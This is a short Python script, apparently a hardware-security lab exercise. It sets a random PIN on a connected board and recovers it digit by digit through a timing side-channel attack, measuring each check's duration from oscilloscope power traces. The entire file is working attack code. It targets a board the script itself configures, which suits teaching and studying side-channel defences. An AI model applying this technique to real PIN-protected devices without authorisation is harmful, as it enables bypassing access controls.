import numpy as np
import time

from board_util import *
from scope_util import *

# Connect to the board
board = Board()

# Connect to the scope
scope = connect_scope()
channel = 1

# Set the PIN to a random value
pin = list(np.random.randint(10, size=4))
board.set_pin(pin)
print(pin)

##### TIMING ATTACK #####

# Get the value at a specific index using timing attack
def get_index_value(board, tested_pin, tested_index):
    timings = []
    for tested_value in range(board.PIN_MAX_VALUE + 1):
        # Forge the PIN to test
        tested_pin[tested_index] = tested_value
        
        # Check PIN and get trace
        board.verify_pin(tested_pin, print_message=False)
        time.sleep(0.1)
        trace = scope.get_waveform(channel)

        # Derivate trace and compare min and max index to get timing
        derivate = np.gradient(trace)
        timing = np.argmin(derivate) - np.argmax(derivate)
        timings.append(timing)
    
        #plot_trace(trace)
        #plot_trace(derivate)

    #print(timings)
    return np.argmax(timings)

# Iterate the timing attack for each value of the PIN
tested_pin = [0,0,0,0]
for tested_index in range(board.PIN_SIZE):
    value = get_index_value(board, tested_pin, tested_index)
    tested_pin[tested_index] = value
    print(tested_pin)

board.verify_pin(tested_pin)
